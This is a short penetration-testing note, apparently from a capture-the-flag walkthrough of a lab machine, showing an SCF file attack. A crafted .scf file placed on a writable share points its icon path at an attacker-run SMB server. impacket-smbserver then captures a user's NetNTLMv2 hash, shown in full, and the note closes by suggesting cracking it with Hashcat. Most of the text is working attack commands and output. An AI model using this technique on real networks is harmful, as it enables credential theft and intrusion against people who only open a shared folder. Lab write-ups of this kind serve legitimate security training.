SCF Attack
SCF Attack First we need to write a file inside the share with writting permissions:
1
2
3
4
5
6
7
(root㉿kali)-[/mnt/tempMount/Users/Public]
└─# cat test.scf
[Shell]
Command=2
IconFile=\\10.10.14.4\shareFolder\smbFile
[Taskbar]
Command=ToggleDesktop
Next, we start an SMB server in our machine:
1
impacket-smbserver shareFolder $(pwd) -smb2support
If someone tries to open our .scf file we’ll receive the hash of the user:
1
2
3
4
5
6
7
8
9
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
...
[*] Incoming connection (10.10.10.103,58241)
[*] AUTHENTICATE_MESSAGE (HTB\amanda,SIZZLE)
[*] User SIZZLE\amanda authenticated successfully
[*] amanda::HTB:aaaaaaaaaaaaaaaa:7fac1cf575b106f729106442743f4137:010100000000000000347f518833d901cb29f904b7bdd5a80000000001001000690055004d0059004b007a005000490003001000690055004d0059004b007a00500049000200100047004100690072005300730078006f000400100047004100690072005300730078006f000700080000347f518833d90106000400020000000800300030000000000000000100000000200000c3e9d2d43adc1d14baf67b8123f7a2fb95d797a9d1c9e7489c4f47ff657f2e810a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310034002e003400000000000000000000000000
...
[*] Remaining connections []
We can try to crack it with Hashcat